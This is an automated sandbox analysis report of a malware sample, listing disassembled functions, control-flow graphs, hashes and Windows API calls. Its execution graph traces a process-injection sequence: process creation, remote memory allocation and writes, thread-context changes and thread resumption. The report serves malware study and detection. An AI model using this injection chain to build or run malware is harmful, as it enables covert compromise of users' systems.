                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: d<nm
                                                        • API String ID: 1029625771-1879898224
                                                        • Opcode ID: 7f51581089d4aedc1607e20577ce5d8ec8a406cfcc03ef9632cbe8680a4cfda1
                                                        • Instruction ID: 1c31e0d7e1c76f9624157a84cb1a85caf5de3b40f5fe0c5843a10fcf3fd8f3a8
                                                        • Opcode Fuzzy Hash: 7f51581089d4aedc1607e20577ce5d8ec8a406cfcc03ef9632cbe8680a4cfda1
                                                        • Instruction Fuzzy Hash: 021114B2D103498FDB10CF9AD884BDEFFF4AB88724F14842AE955A7200C774A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01259C78 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 61 1259c78-1259cb8 62 1259cc0-1259ceb GetModuleHandleW 61->62 63 1259cba-1259cbd 61->63 64 1259cf4-1259d08 62->64 65 1259ced-1259cf3 62->65 63->62 65->64
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID: d<nm
                                                        • API String ID: 4139908857-1879898224
                                                        • Opcode ID: 0f62ad22d5afa1430e19d88d0fc4145dbd0afb865fc32e5346ae7c1914293a1d
                                                        • Instruction ID: 8bbc498ee6419da7b478e36503d8be0ba80dabf7039c1da5f8d484455731c1ff
                                                        • Opcode Fuzzy Hash: 0f62ad22d5afa1430e19d88d0fc4145dbd0afb865fc32e5346ae7c1914293a1d
                                                        • Instruction Fuzzy Hash: A011E0B6C00249CFDB10CF9AC584BDEFBF4AF88724F14846AD929A7610C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01259C77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 67 1259c77-1259cb8 68 1259cc0-1259ceb GetModuleHandleW 67->68 69 1259cba-1259cbd 67->69 70 1259cf4-1259d08 68->70 71 1259ced-1259cf3 68->71 69->68 71->70
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID: d<nm
                                                        • API String ID: 4139908857-1879898224
                                                        • Opcode ID: 5ab953cff2561bee9cfa27f34d002d73eac1040b83efc2190d3c32cde8087762
                                                        • Instruction ID: 15c181e3d7e73f913a5a1c38e1398624c561f78c0ef93161073255c97c7325d0
                                                        • Opcode Fuzzy Hash: 5ab953cff2561bee9cfa27f34d002d73eac1040b83efc2190d3c32cde8087762
                                                        • Instruction Fuzzy Hash: 2811E0B6C00249CFDB10CF9AC584BDEFBF4AF48624F14846AD929B7610C374A585CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01259A98 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 73 1259a98-1259aad call 12576f4 76 1259ac3-1259ac7 73->76 77 1259aaf 73->77 78 1259ac9-1259ad3 76->78 79 1259adb-1259b1c 76->79 127 1259ab5 call 1259d20 77->127 128 1259ab5 call 1259d10 77->128 78->79 84 1259b1e-1259b26 79->84 85 1259b29-1259b37 79->85 80 1259abb-1259abd 80->76 81 1259bf8-1259cb8 80->81 122 1259cc0-1259ceb GetModuleHandleW 81->122 123 1259cba-1259cbd 81->123 84->85 87 1259b39-1259b3e 85->87 88 1259b5b-1259b5d 85->88 89 1259b40-1259b47 call 1258cdc 87->89 90 1259b49 87->90 91 1259b60-1259b67 88->91 93 1259b4b-1259b59 89->93 90->93 94 1259b74-1259b7b 91->94 95 1259b69-1259b71 91->95 93->91 98 1259b7d-1259b85 94->98 99 1259b88-1259b8a call 1258cec 94->99 95->94 98->99 102 1259b8f-1259b91 99->102 104 1259b93-1259b9b 102->104 105 1259b9e-1259ba3 102->105 104->105 106 1259ba5-1259bac 105->106 107 1259bc1-1259bce 105->107 106->107 108 1259bae-1259bbe call 1258cfc call 1258d0c 106->108 114 1259bf1-1259bf7 107->114 115 1259bd0-1259bee 107->115 108->107 115->114 124 1259cf4-1259d08 122->124 125 1259ced-1259cf3 122->125 123->122 125->124 127->80 128->80
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: ecffedea5305dd3a36229bc6a216f8c68f88dcc7716ebf34b524c0636c3c4961
                                                        • Instruction ID: 76443f668eda8d6faec040efbee1e1814cd500c7210ea31b8a911448dc611f76
                                                        • Opcode Fuzzy Hash: ecffedea5305dd3a36229bc6a216f8c68f88dcc7716ebf34b524c0636c3c4961
                                                        • Instruction Fuzzy Hash: 5A713970A10B068FEB64DF29D09075ABBF1BF88304F10892DD99AD7A40EB75E845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 011FD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6ee7a33110430938771fa08a981ba4b80f70f80b425f74bd7cc0174f5230fe8
                                                        • Instruction ID: c486b8c5622e08191e447a1bbd7e253d95dd4bf5f7ffc6433811d880115abbbf
                                                        • Opcode Fuzzy Hash: a6ee7a33110430938771fa08a981ba4b80f70f80b425f74bd7cc0174f5230fe8
                                                        • Instruction Fuzzy Hash: 2C2106B1504240DFDF09DF58E9C4B26BF75FB84328F24856DDA450B216C336D846D7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120D1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18adad7544f684c6007fe5825782fa5ea388c9ca3671abb05b4f9d5e00f91827
                                                        • Instruction ID: defc7b7ee0edf165c11fdd0e9652b88c9ec12525e087bf90845940f1ba3667b4
                                                        • Opcode Fuzzy Hash: 18adad7544f684c6007fe5825782fa5ea388c9ca3671abb05b4f9d5e00f91827
                                                        • Instruction Fuzzy Hash: 68212271514248EFDB02DF98D9C0B26BBA1FB84324F20CB6DE9494B287C376D846CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120D01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7216e0672940d578ed1c9d2b6b432d1599f6d338279040eb154f7072892c7ea
                                                        • Instruction ID: 02e340e882c198961c1119b2f89d4b60ce70b465b3aaf24b01adcf2866415280
                                                        • Opcode Fuzzy Hash: e7216e0672940d578ed1c9d2b6b432d1599f6d338279040eb154f7072892c7ea
                                                        • Instruction Fuzzy Hash: 3C214571614248DFDB12CF98D8C0B16BB62FB84364F20CA69D94E0B287C336D807CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 011FD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction ID: 948417058fce70306e7194dc84446f2df7d70ea37fb6b34f9a592327c809e08c
                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction Fuzzy Hash: 4311AF76504280CFDF16CF54E5C4B26BF71FB84324F2486ADD9450B666C336D45ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120D017 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: 90275c15bf7c77c478f16c6daf0d95f701b98af20a276383731cb45b87b4587d
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 8D11BB75504284CFDB12CF58D5C4B15BBA2FB84324F28C6AAD9494B697C33AD44ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120D1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: f8bbe33b9038ab48ad67dea9c92d321c2aa9e61ea9cc333d802dbacd1d7c0610
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 3611BB75905284DFDB02CF98C5C0B15BBA1FB84324F28C6ADD9494B697C33AD44ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 011FD745 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef2a4d6b35465b2c9ce4c5327bf7053bc24c441871766caf41f342eb81abff84
                                                        • Instruction ID: e538f0ba1700b6e5f2d1634df9b3a6c7436d38faf696961b24fc934a214e2d48
                                                        • Opcode Fuzzy Hash: ef2a4d6b35465b2c9ce4c5327bf7053bc24c441871766caf41f342eb81abff84
                                                        • Instruction Fuzzy Hash: 7201F7715087C09AEB198E99DC84B76BF98EF41678F08861EEF051F246C3789844C6B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 011FD744 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8635437a742cc83782cb836d190e1ea0be85b8939eb471f8d0514b4796d66bda
                                                        • Instruction ID: 1f997b813707576a1b6fdc0ceddc412759f7cbb58d8173157f1c7e3cbf13f873
                                                        • Opcode Fuzzy Hash: 8635437a742cc83782cb836d190e1ea0be85b8939eb471f8d0514b4796d66bda
                                                        • Instruction Fuzzy Hash: 3CF0C2714047849EEB158E59DCC4B72FF98EB81634F18C55EEE081F286C3789844CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0125ECB0 Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 955583e33bf6643226d4e853386b7f5c96248f3d2020452e59800c58b3cc3529
                                                        • Instruction ID: 58e5b93b34a0acaaef433a4e08590411fe67c7cf0e72470b3838ec0bf376045f
                                                        • Opcode Fuzzy Hash: 955583e33bf6643226d4e853386b7f5c96248f3d2020452e59800c58b3cc3529
                                                        • Instruction Fuzzy Hash: 5E1292F14217468AF310CFA5E99B18D7FA3B78532CB924208F2615EAD1DBB815CACF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0125C884 Relevance: .3, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ced8efdb15f162f84688bedb8c72855dcaf66732ee1f09b90fe0e5639e55a7a
                                                        • Instruction ID: c040d422fea012f99f5d23704e84a490d28834330e551b203f5d9a2606cecfac
                                                        • Opcode Fuzzy Hash: 9ced8efdb15f162f84688bedb8c72855dcaf66732ee1f09b90fe0e5639e55a7a
                                                        • Instruction Fuzzy Hash: 34A18632E2020ACFCF05DFA5C9845EDBBB6FF85300B158569E905BB261EB319955CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0125ECA1 Relevance: .2, Instructions: 221COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc90adcf16dfeabf2d2550b94fe45fd69ede5df786ffe1967afe23dd8f5c6695
                                                        • Instruction ID: febcf38bff033722eb4e7fb0ef2512c7ec2a188bef258592d2826f53a3379bc0
                                                        • Opcode Fuzzy Hash: fc90adcf16dfeabf2d2550b94fe45fd69ede5df786ffe1967afe23dd8f5c6695
                                                        • Instruction Fuzzy Hash: 2EC1F7B18217468AE710DFA5E88B18D7FA2BB8532CF564208F2616F6D0DFB415CACF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:13.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:234
                                                        Total number of Limit Nodes:17
                                                        execution_graph 19568 2e099a0 19572 2e09a88 19568->19572 19580 2e09a98 19568->19580 19569 2e099af 19573 2e09aab 19572->19573 19574 2e09ac3 19573->19574 19588 2e09d20 19573->19588 19592 2e09d10 19573->19592 19574->19569 19575 2e09abb 19575->19574 19576 2e09cc0 GetModuleHandleW 19575->19576 19577 2e09ced 19576->19577 19577->19569 19581 2e09aab 19580->19581 19582 2e09ac3 19581->19582 19586 2e09d20 LoadLibraryExW 19581->19586 19587 2e09d10 LoadLibraryExW 19581->19587 19582->19569 19583 2e09abb 19583->19582 19584 2e09cc0 GetModuleHandleW 19583->19584 19585 2e09ced 19584->19585 19585->19569 19586->19583 19587->19583 19589 2e09d34 19588->19589 19590 2e09d59 19589->19590 19596 2e08d38 19589->19596 19590->19575 19593 2e09d34 19592->19593 19594 2e09d59 19593->19594 19595 2e08d38 LoadLibraryExW 19593->19595 19594->19575 19595->19594 19597 2e09f00 LoadLibraryExW 19596->19597 19599 2e09f79 19597->19599 19599->19590 19863 2e0bdd0 19864 2e0be36 19863->19864 19868 2e0bf80 19864->19868 19871 2e0bf90 19864->19871 19865 2e0bee5 19874 2e0a7e4 19868->19874 19872 2e0bfbe 19871->19872 19873 2e0a7e4 DuplicateHandle 19871->19873 19872->19865 19873->19872 19875 2e0bff8 DuplicateHandle 19874->19875 19876 2e0bfbe 19875->19876 19876->19865 19600 86b34ce 19601 86b347f 19600->19601 19602 86b348d 19601->19602 19605 86b3b0e 19601->19605 19611 86b3ab0 19601->19611 19606 86b3ab3 19605->19606 19606->19605 19607 86b3ab5 19606->19607 19617 86b3c0b 19606->19617 19633 86b3c20 19606->19633 19649 86b3c4d 19606->19649 19607->19602 19612 86b3ab3 19611->19612 19613 86b3ab5 19612->19613 19614 86b3c0b 12 API calls 19612->19614 19615 86b3c4d 12 API calls 19612->19615 19616 86b3c20 12 API calls 19612->19616 19613->19602 19614->19613 19615->19613 19616->19613 19618 86b3c56 19617->19618 19665 86b305c 19618->19665 19669 86b3068 19618->19669 19634 86b3c56 19633->19634 19647 86b3068 CreateProcessA 19634->19647 19648 86b305c CreateProcessA 19634->19648 19635 86b3c85 19635->19607 19636 86b3cf9 19636->19635 19645 86b2dd8 WriteProcessMemory 19636->19645 19646 86b2de0 WriteProcessMemory 19636->19646 19673 86b29da 19636->19673 19678 86b29e8 19636->19678 19683 86b2938 19636->19683 19687 86b2930 19636->19687 19691 86b2d20 19636->19691 19695 86b2d1a 19636->19695 19699 86b2ec8 19636->19699 19703 86b2ed0 19636->19703 19645->19636 19646->19636 19647->19636 19648->19636 19650 86b3c56 19649->19650 19651 86b3c85 19649->19651 19653 86b3068 CreateProcessA 19650->19653 19654 86b305c CreateProcessA 19650->19654 19651->19607 19652 86b3cf9 19652->19651 19655 86b2938 ResumeThread 19652->19655 19656 86b2930 ResumeThread 19652->19656 19657 86b2ec8 ReadProcessMemory 19652->19657 19658 86b2ed0 ReadProcessMemory 19652->19658 19659 86b2dd8 WriteProcessMemory 19652->19659 19660 86b2de0 WriteProcessMemory 19652->19660 19661 86b29da SetThreadContext 19652->19661 19662 86b29e8 SetThreadContext 19652->19662 19663 86b2d1a VirtualAllocEx 19652->19663 19664 86b2d20 VirtualAllocEx 19652->19664 19653->19652 19654->19652 19655->19652 19656->19652 19657->19652 19658->19652 19659->19652 19660->19652 19661->19652 19662->19652 19663->19652 19664->19652 19666 86b30f1 CreateProcessA 19665->19666 19668 86b32b3 19666->19668 19670 86b30f1 19669->19670 19670->19670 19671 86b3256 CreateProcessA 19670->19671 19672 86b32b3 19671->19672 19674 86b2a1d 19673->19674 19675 86b2cad SetThreadContext 19674->19675 19677 86b2a70 19674->19677 19676 86b2cd5 19675->19676 19676->19636 19677->19636 19679 86b2a1d 19678->19679 19680 86b2cad SetThreadContext 19679->19680 19682 86b2a70 19679->19682 19681 86b2cd5 19680->19681 19681->19636 19682->19636 19684 86b2978 ResumeThread 19683->19684 19686 86b29a9 19684->19686 19686->19636 19688 86b2978 ResumeThread 19687->19688 19690 86b29a9 19688->19690 19690->19636 19692 86b2d60 VirtualAllocEx 19691->19692 19694 86b2d9d 19692->19694 19694->19636 19696 86b2d20 VirtualAllocEx 19695->19696 19698 86b2d9d 19696->19698 19698->19636 19700 86b2f1b ReadProcessMemory 19699->19700 19702 86b2f5f 19700->19702 19702->19636 19704 86b2f1b ReadProcessMemory 19703->19704 19706 86b2f5f 19704->19706 19706->19636 19707 2e043c8 19708 2e043da 19707->19708 19709 2e043e6 19708->19709 19713 2e044d8 19708->19713 19718 2e03b9c 19709->19718 19711 2e04405 19714 2e044fd 19713->19714 19722 2e045c8 19714->19722 19726 2e045d8 19714->19726 19719 2e03ba7 19718->19719 19734 2e05b2c 19719->19734 19721 2e06df1 19721->19711 19724 2e045d8 19722->19724 19723 2e046dc 19723->19723 19724->19723 19730 2e04124 19724->19730 19728 2e045ff 19726->19728 19727 2e046dc 19728->19727 19729 2e04124 CreateActCtxA 19728->19729 19729->19727 19731 2e05668 CreateActCtxA 19730->19731 19733 2e0572b 19731->19733 19735 2e05b37 19734->19735 19738 2e05b84 19735->19738 19737 2e070a5 19737->19721 19739 2e05b8f 19738->19739 19742 2e05bb4 19739->19742 19741 2e07182 19741->19737 19743 2e05bbf 19742->19743 19746 2e05be4 19743->19746 19745 2e07282 19745->19741 19747 2e05bef 19746->19747 19748 2e079dc 19747->19748 19751 2e0baf8 19747->19751 19756 2e0bb08 19747->19756 19748->19745 19752 2e0bb08 19751->19752 19753 2e0bb4d 19752->19753 19761 2e0bca7 19752->19761 19765 2e0bcb8 19752->19765 19753->19748 19757 2e0bb29 19756->19757 19758 2e0bb4d 19757->19758 19759 2e0bca7 2 API calls 19757->19759 19760 2e0bcb8 2 API calls 19757->19760 19758->19748 19759->19758 19760->19758 19763 2e0bcc5 19761->19763 19762 2e0bcff 19762->19753 19763->19762 19769 2e0a75c 19763->19769 19766 2e0bcc5 19765->19766 19767 2e0a75c 2 API calls 19766->19767 19768 2e0bcff 19766->19768 19767->19768 19768->19753 19771 2e0a767 19769->19771 19770 2e0c9f8 19771->19770 19773 2e0c5b8 19771->19773 19774 2e0c5c3 19773->19774 19775 2e05be4 2 API calls 19774->19775 19776 2e0ca67 19775->19776 19780 2e0e7e8 19776->19780 19786 2e0e7da 19776->19786 19777 2e0caa0 19777->19770 19782 2e0e865 19780->19782 19783 2e0e819 19780->19783 19781 2e0e825 19781->19777 19782->19777 19783->19781 19784 2e0ec57 LoadLibraryExW GetModuleHandleW 19783->19784 19785 2e0ec68 LoadLibraryExW GetModuleHandleW 19783->19785 19784->19782 19785->19782 19788 2e0e7e8 19786->19788 19787 2e0e825 19787->19777 19788->19787 19789 2e0ec57 LoadLibraryExW GetModuleHandleW 19788->19789 19790 2e0ec68 LoadLibraryExW GetModuleHandleW 19788->19790 19789->19787 19790->19787 19791 86b41c0 19792 86b434b 19791->19792 19793 86b41e6 19791->19793 19793->19792 19796 86b4438 PostMessageW 19793->19796 19798 86b4440 PostMessageW 19793->19798 19797 86b44ac 19796->19797 19797->19793 19799 86b44ac 19798->19799 19799->19793 19800 86b5180 19801 86b519e 19800->19801 19802 86b51a8 19800->19802 19805 86b51e8 19801->19805 19810 86b51d3 19801->19810 19802->19802 19806 86b51f6 19805->19806 19807 86b5215 19805->19807 19814 86b4b34 19806->19814 19807->19802 19811 86b5204 19810->19811 19812 86b4b34 FindCloseChangeNotification 19811->19812 19813 86b5211 19812->19813 19813->19802 19815 86b5360 FindCloseChangeNotification 19814->19815 19816 86b5211 19815->19816 19816->19802 19817 86b3447 19818 86b341b 19817->19818 19819 86b3617 19818->19819 19820 86b347d 19818->19820 19822 86b3401 19818->19822 19826 86b36e0 SetThreadContext 19818->19826 19853 86b3640 19818->19853 19858 86b3630 19818->19858 19821 86b29e8 SetThreadContext 19820->19821 19823 86b354f 19820->19823 19821->19822 19822->19823 19831 86b371a 19822->19831 19837 86b36e0 19822->19837 19845 86b3707 19822->19845 19849 86b36f0 19822->19849 19826->19820 19832 86b3729 19831->19832 19833 86b29e8 SetThreadContext 19832->19833 19834 86b379e 19833->19834 19835 86b29e8 SetThreadContext 19834->19835 19836 86b375b 19835->19836 19836->19822 19838 86b36ea 19837->19838 19839 86b3651 19837->19839 19842 86b3640 SetThreadContext 19838->19842 19844 86b3899 19838->19844 19840 86b364d 19839->19840 19841 86b29e8 SetThreadContext 19839->19841 19840->19822 19843 86b3649 19841->19843 19842->19838 19843->19822 19847 86b370a 19845->19847 19846 86b3899 19847->19846 19848 86b3640 SetThreadContext 19847->19848 19848->19847 19851 86b370a 19849->19851 19850 86b3640 SetThreadContext 19850->19851 19851->19850 19852 86b3899 19851->19852 19855 86b3651 19853->19855 19854 86b364d 19854->19820 19855->19854 19856 86b29e8 SetThreadContext 19855->19856 19857 86b3649 19856->19857 19857->19820 19859 86b364d 19858->19859 19862 86b3651 19858->19862 19859->19820 19860 86b29e8 SetThreadContext 19861 86b3649 19860->19861 19861->19820 19862->19859 19862->19860

                                                        Executed Functions

                                                        Function 086B29E8 Relevance: 1.8, APIs: 1, Instructions: 259threadinjectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 86b29e8-86b2a17 1 86b2abe-86b2ac1 0->1 2 86b2a1d-86b2a33 0->2 3 86b2b0d-86b2b10 1->3 4 86b2ac3-86b2acb 1->4 5 86b2a39-86b2a41 2->5 6 86b2c2e-86b2c93 2->6 7 86b2c26-86b2c2d 3->7 8 86b2b16-86b2b2c 3->8 9 86b2ad9-86b2aff 4->9 10 86b2acd-86b2acf 4->10 5->6 11 86b2a47-86b2a57 5->11 25 86b2ca3-86b2cd3 SetThreadContext 6->25 26 86b2c95-86b2ca1 6->26 8->6 12 86b2b32-86b2b3a 8->12 9->6 27 86b2b05-86b2b08 9->27 10->9 11->6 13 86b2a5d-86b2a6a 11->13 12->6 15 86b2b40-86b2b4d 12->15 13->6 16 86b2a70-86b2a87 13->16 15->6 18 86b2b53-86b2b63 15->18 19 86b2a89-86b2a8c 16->19 20 86b2a8e 16->20 18->6 23 86b2b69-86b2b86 18->23 24 86b2a90-86b2ab9 19->24 20->24 23->6 28 86b2b8c-86b2b94 23->28 24->7 32 86b2cdc-86b2d0c 25->32 33 86b2cd5-86b2cdb 25->33 26->25 27->7 28->6 31 86b2b9a-86b2baa 28->31 31->6 34 86b2bb0-86b2bbd 31->34 33->32 34->6 36 86b2bbf-86b2bd6 34->36 39 86b2bdb-86b2c19 36->39 40 86b2bd8 36->40 48 86b2c1b 39->48 49 86b2c1e 39->49 40->39 48->49 49->7
                                                        APIs
                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 086B2CC6
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ContextThread
                                                        • String ID:
                                                        • API String ID: 1591575202-0
                                                        • Opcode ID: c0aa5e6d3f9272aa642e5d5786bad7203e5ec2ef35af2f7312a8ee312ffc6f16
                                                        • Instruction ID: fefbe686e5c2c02a6ee232fdc71b8f18803a429d55535f002512e24c8cc1dd09
                                                        • Opcode Fuzzy Hash: c0aa5e6d3f9272aa642e5d5786bad7203e5ec2ef35af2f7312a8ee312ffc6f16
                                                        • Instruction Fuzzy Hash: BE91CF70A005258FCB55DB6DC8A07BEFBE2EF85315B25C61AD419A7349CB74AC82CBD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 086B305C Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
